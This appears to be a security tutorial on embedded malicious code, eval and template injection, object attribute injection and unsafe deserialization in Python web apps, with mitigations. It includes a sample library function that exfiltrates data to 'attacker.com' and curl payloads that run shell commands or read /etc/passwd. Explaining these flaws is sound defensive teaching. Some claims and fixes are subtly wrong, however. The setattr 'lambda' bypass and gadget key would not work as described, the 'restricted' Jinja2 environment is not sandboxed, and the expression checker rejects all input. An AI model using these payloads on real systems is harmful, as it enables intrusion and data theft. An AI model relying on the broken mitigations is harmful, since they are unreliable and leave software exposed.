Embedded Malware and Dynamic Modification

Embedded malware and dynamic modification refer to situations where malicious behavior runs inside trusted application logic. Hidden code, unsafe runtime execution, or injected behavior allow attackers to steal data, run commands, or alter core functionality without obvious signs.

These issues exploit normal execution paths and trusted components. Security controls lose value when attackers control code flow at runtime, making detection and impact containment difficult.

Real-World Attack Scenarios

Scenario 1: Embedded Malicious Code in Supply Chain

Developer intentionally or unknowingly includes malicious code in library:

# Library: popular_utility.py
# Appears normal, but includes hidden malicious code

def useful_function():
    # Normal functionality
    return process_data()

def process_data():
    # Normal code
    data = fetch_data()
    
    # HIDDEN MALICIOUS CODE
    import requests
    requests.post('https://attacker.com/steal', json={
        'data': data,
        'time': __import__('time').time()
    })
    
    return data

The attack:

1. Library published to package manager

2. Thousands of applications download it

3. Every application using the library exfiltrates data

4. Attacker collects data from all applications simultaneously

Result:

• Mass data breach

• Affects all users of the library

• Very hard to detect initially

Finding it: Code review of dependencies. Monitor outbound network requests. Check package source code.

---

Scenario 2: Dynamic Code Injection via eval()

Application uses dynamic code execution without validation:

@app.route('/api/calculate', methods=['POST'])
def calculate():
    expression = request.json.get('expression')
    
    # VULNERABLE - eval() executes arbitrary code
    result = eval(expression)
    
    return {'result': result}

The attack:

# Attacker sends malicious expression
curl -X POST http://example.com/api/calculate \
  -H "Content-Type: application/json" \
  -d '{"expression": "__import__(\"os\").system(\"whoami\")"}'

# eval() executes the Python code
# Attacker gets remote code execution

Or steal data:

# In request
{"expression": "open('/etc/passwd').read()"}

# Returns contents of /etc/passwd

Result:

• Remote code execution

• File system access

• Complete system compromise

Finding it: Search for eval(), exec(), Function() in code. Test with code injection payloads.

---

Scenario 3: Dynamic Object Property Injection

Application dynamically sets object properties:

class User:
    def __init__(self, username):
        self.username = username

@app.route('/api/user', methods=['POST'])
def update_user():
    data = request.json
    user = User(data['username'])
    
    # VULNERABLE - Sets arbitrary attributes
    for key, value in data.items():
        setattr(user, key, value)
    
    return user.__dict__

The attack:

Attacker injects malicious attributes:

curl -X POST http://example.com/api/user \
  -H "Content-Type: application/json" \
  -d '{
    "username": "attacker",
    "is_admin": true,
    "can_delete": true,
    "__class__.__bases__[0].__subclasses__()[104].__init__.__globals__[\"sys\"].modules[\"os\"].system": "echo pwned"
  }'

Or modify object methods:

# Request data
{
  "username": "attacker",
  "validate": "lambda: True"  # Override validation
}

# User.validate() now always returns True
# Bypasses all security checks

Result:

• Method override

• Validation bypass

• Privilege escalation

• Code execution via gadget chains

Finding it: Look for setattr(), __setattr__(), dynamic property assignment. Test with object injection payloads.

---

Scenario 4: Unsafe Deserialization Leading to Code Injection

Covered in detail in serialization article, but core concept:

Application deserializes untrusted data without validation:

import pickle

data = request.args.get('data')
decoded = base64.b64decode(data)

# Deserialize untrusted data
obj = pickle.loads(decoded)  # VULNERABLE

return {'result': obj}

The attack:

Attacker crafts malicious serialized object that executes code during deserialization.

Result:

• Remote code execution

• System compromise

---

Scenario 5: Template Injection with Code Execution

Application uses template engine unsafely:

from jinja2 import Template

@app.route('/email', methods=['POST'])
def send_email():
    template_str = request.json.get('template')
    
    # VULNERABLE - Renders untrusted template
    template = Template(template_str)
    output = template.render(user=request.user)
    
    send_email_template(output)

The attack:

Attacker injects template code:

curl -X POST http://example.com/email \
  -H "Content-Type: application/json" \
  -d '{
    "template": "{{ ''.__class__.__mro__[1].__subclasses__()[396](\"touch /tmp/pwned\").communicate() }}"
  }'

Template engine evaluates the injected code during rendering.

Result:

• Remote code execution

• Command execution

• System compromise

Finding it: Look for template rendering of user input. Test with template injection payloads.

---

Mitigation Strategies

Never use eval() or exec()

# Bad
result = eval(user_expression)

# Good - Use expression evaluator library
from simpleeval import simple_eval
result = simple_eval(user_expression, names={'x': 5})

Use allowlists for object attributes

ALLOWED_ATTRIBUTES = {'username', 'email', 'preferences'}

for key, value in data.items():
    if key in ALLOWED_ATTRIBUTES:
        setattr(user, key, value)
    else:
        raise ValueError(f"Attribute {key} not allowed")

Never deserialize untrusted data

# Bad
obj = pickle.loads(untrusted_data)

# Good - Never deserialize untrusted data
# Use JSON instead
import json
obj = json.loads(untrusted_data)

Use safe template engines

# Bad - eval() available
template = Template(user_input)

# Good - Restricted template engine
from jinja2 import Environment, select_autoescape

env = Environment(
    autoescape=select_autoescape(['html', 'xml']),
    # Disable unsafe features
)
template = env.from_string(user_input)

Code review for security

• Review all dynamic code execution

• Verify no eval(), exec(), or equivalent

• Check object property assignment

• Audit deserialization usage

Runtime protection

# Monitor for suspicious patterns
import ast

def is_safe_expression(expr):
    """Only allow safe math expressions"""
    try:
        tree = ast.parse(expr, mode='eval')
        
        # Only allow specific node types
        allowed = (ast.BinOp, ast.Num, ast.Add, ast.Sub, ast.Mult, ast.Div)
        
        for node in ast.walk(tree):
            if not isinstance(node, allowed):
                return False
        
        return True
    except:
        return False

if is_safe_expression(user_expr):
    result = eval(user_expr)
else:
    raise ValueError("Expression not allowed")

---

CWE - CWE-506: Embedded Malicious Code (4.19.1)cwe.mitre.org

CWE - CWE-915: Improperly Controlled Modification of Dynamically-Determined Object Attributes (4.19)cwe.mitre.org

Code Injection | OWASP Foundationowasp.org

CWE - CWE-506: Embedded Malicious Code (4.19.1)cwe.mitre.org